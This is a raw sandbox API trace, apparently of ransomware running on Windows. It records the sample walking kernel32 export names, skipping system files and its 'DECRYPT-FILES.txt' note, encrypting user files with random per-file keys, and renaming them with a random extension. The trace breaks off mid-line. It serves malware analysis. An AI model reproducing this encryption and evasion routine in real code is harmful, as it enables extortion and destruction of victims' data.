[0082.564] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.564] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.564] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.564] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.564] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.564] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.564] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.564] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.565] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.565] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.565] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.565] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.565] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.565] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.565] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.565] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav") returned 60 [0082.565] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav.ck5Mhr") returned 67 [0082.565] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vt5loz_qw3.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav.ck5Mhr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vt5loz_qw3.wav.ck5mhr"), dwFlags=0x0) returned 1 [0082.566] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.566] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.566] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.566] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8785a0, ftCreationTime.dwHighDateTime=0x1d4cd27, ftLastAccessTime.dwLowDateTime=0x904a3840, ftLastAccessTime.dwHighDateTime=0x1d4c98a, ftLastWriteTime.dwLowDateTime=0x904a3840, ftLastWriteTime.dwHighDateTime=0x1d4c98a, nFileSizeHigh=0x0, nFileSizeLow=0x2295, dwReserved0=0x0, dwReserved1=0x0, cFileName="wHEMr.bmp", cAlternateFileName="")) returned 1 [0082.566] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0082.566] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="autorun.inf") returned 1 [0082.566] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="boot.ini") returned 1 [0082.567] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="desktop.ini") returned 1 [0082.567] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="ntuser.dat") returned 1 [0082.567] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="iconcache.db") returned 1 [0082.567] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="bootsect.bak") returned 1 [0082.567] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="ntuser.dat.log") returned 1 [0082.567] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="thumbs.db") returned 1 [0082.567] lstrcmpiW (lpString1="wHEMr.bmp", lpString2="Bootfont.bin") returned 1 [0082.567] lstrlenW (lpString="wHEMr.bmp") returned 9 [0082.567] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0082.567] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0082.567] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0082.567] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0082.567] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.567] lstrlenW (lpString="wHEMr.bmp") returned 9 [0082.567] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.567] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="wHEMr.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp" [0082.567] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.567] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wHEMr.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\whemr.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.567] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=8853) returned 1 [0082.567] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.567] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.568] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.568] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.568] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.568] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0082.568] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.569] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.569] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.569] CloseHandle (hObject=0x444) returned 1 [0082.569] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.569] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0082.570] CloseHandle (hObject=0x0) returned 0 [0082.570] CloseHandle (hObject=0x440) returned 1 [0082.570] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.570] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.571] GetTickCount () returned 0x114d1e0 [0082.571] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.571] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.571] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.571] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.571] lstrlenA (lpString="kernel32.dll") returned 12 [0082.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.572] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.572] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.572] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.572] lstrlenA (lpString="ADDATOMA") returned 8 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.572] lstrlenA (lpString="ADDATOMW") returned 8 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.572] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.572] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.572] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.572] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.572] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.572] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.572] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.572] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.572] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.572] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.572] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.572] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.572] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.572] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.573] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.573] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.573] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.573] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.573] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.573] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.573] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.573] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.573] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.573] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.573] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.573] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.573] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.573] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.573] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.573] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.573] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.573] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.574] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.574] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.574] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.574] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.574] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.574] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.574] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.574] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.574] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.574] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.574] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.574] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.574] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.574] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.574] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.574] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.574] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.574] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.575] lstrlenA (lpString="BEEP") returned 4 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.575] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.575] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.575] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.575] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.575] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.575] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.575] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.575] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.575] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.575] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.575] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.575] lstrlenA (lpString="CANCELIO") returned 8 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.575] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.575] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.575] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.575] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.575] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.575] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.575] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.576] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.576] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.576] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.576] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.576] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.576] lstrcpyA (in: 